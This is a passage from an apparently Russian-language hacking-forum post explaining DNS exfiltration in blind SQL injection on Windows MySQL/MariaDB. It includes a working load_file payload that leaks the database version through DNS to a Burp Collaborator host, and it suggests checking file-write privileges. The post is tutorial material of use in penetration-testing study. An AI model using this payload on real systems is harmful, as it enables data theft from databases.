↑
Вот на этом моменте, нужно запомнить, что это справедливо только для Windows, ибо
UNC
.
Ничего не меняется
Отображается факт резолва доменного имени. Которое было запрошено в результате выполнения SQL запроса, инъекции в текущем кейсе.
Техника называется DNS Exfiltration и относится к классу Out-of-Band (OOB) техник. Применима в различных видах слепых (blind) уязвимостей и не только. Простым языком, атакующий вытягивает данные через DNS запросы с атакуемой машины к своему DNS серверу. Например, используя такой запрос:
Код:
(select load_file(concat('\\\\',version(),'.burpcollaborator.net\\')))
Прилетит, что-то типа
10.3.31-MariaDB-0ubuntu0.20.04.1.burpcollaborator.net
и т.д. и т.п. Более подробно про OOB в MySQL:
https://www.exploit-db.com/docs/engl...nd-hacking.pdf
Стоит отмтетить, что техники типа Time-Based, Boolean-Based, OOB, стоит использовать в последнюю очередь, в связи с их накладными расходами и лишней "шумностью". И как правильно подметил
@dooble
, нужно проверить права на запись файлов, что будет гораздо проще, а, возможно даже, это есть основная цель атаки